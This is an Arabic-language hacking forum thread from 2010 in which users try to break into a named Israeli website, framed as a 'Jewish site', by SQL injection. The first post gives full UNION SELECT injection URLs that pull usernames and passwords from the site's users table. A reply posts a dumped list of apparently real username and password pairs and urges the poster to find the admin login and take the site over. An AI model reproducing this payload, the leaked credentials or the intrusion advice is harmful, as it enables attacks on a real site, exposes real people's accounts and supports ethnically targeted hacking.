:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   جـــ'ابات العناكــ'ب (http://www.vbspiders.com/vb/f343.html)
-   -   مشكلة في محاولت حقن موقع يهودي (http://www.vbspiders.com/vb/t29490.html)

mol javil 05-16-2010 03:11 AM

مشكلة في محاولت حقن موقع يهودي
 
السلا م عليكم
حاولت اختراق الموقع الاسرائيلي smilies3

http://www.maarav.org.il

.........وبعدة استخراج اليوزر والباسورد

وادخالها في لوحة التحكم

http://maarav.org.il/wp-login.php

لم يقبلها الموقع smilies4

وايكم الحقنة :Great:
كود PHP:

http://www.maarav.org.il/classes/PUItem.php?id=-959+UNION+SELECT+1,2,concat(user_name,0x3a, password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+ users 

فجربت كما بالدرس تغيير اسم الجدول :666:

الى ان الموقع يحتوي على اسم واحد.............:a09:

فغيرت السيجما.............فطلعلي نفس الباس smilies11

..........ربما يكون الباس مشفر فجربت افك التشفير من الموقع smilies4

http://hashkiller.com/password/X&1poW


وللاسف لم يقبل الباس smilies6
....................اين الخطء اذا g090
*ملاحضة*....عندما اضيف كلمة
Group_
بجانب
concat(user_name,0x3a, password)
يعني لم تصبح الحقنة هكذا

كود PHP:

http://www.maarav.org.il/classes/PUItem.php?id=-959+UNION+SELECT+1,2,group_concat(user_name,0x3a, password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+ users 


يعطيني عدة باسوردات ايعني هذا انها عضوية الاعضاء وليس المدير...... !



المرجو الاجابة لان الموضوع جنني :a02:

ManiMan43 05-16-2010 08:44 AM

james:tR-a1h,ronen:D@e8iA,glandon:drlu$P,meir:n$r1X3,mushon :u9$Ha3,galit:drlu$P,michael:X&1poW,asaf:hrk*22,jo hn:bA*11L,efi:eIq&2b,gluya:Pv&s2h

هده هي يوزرات الموقع يا اخي ابحث عن اللوحة و ادعسه

ManiMan43 05-16-2010 08:53 AM

http://maarav.org.il/wp-login.php

هده لوحة التحكم

mol javil 05-16-2010 01:57 PM

[align=center]جزاك الله خيرا اخ ManiMan43

لاكن المشكل تكمن هنا
فالموقع ليقبل الباس واليوزر

إضافتا إلى أني جربت أغير السجما وللأسف لم انجح

ومازلت اشك بان البس مشفر
رغم أني حاولت أفك التشفير
[/align]


الساعة الآن 04:30 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0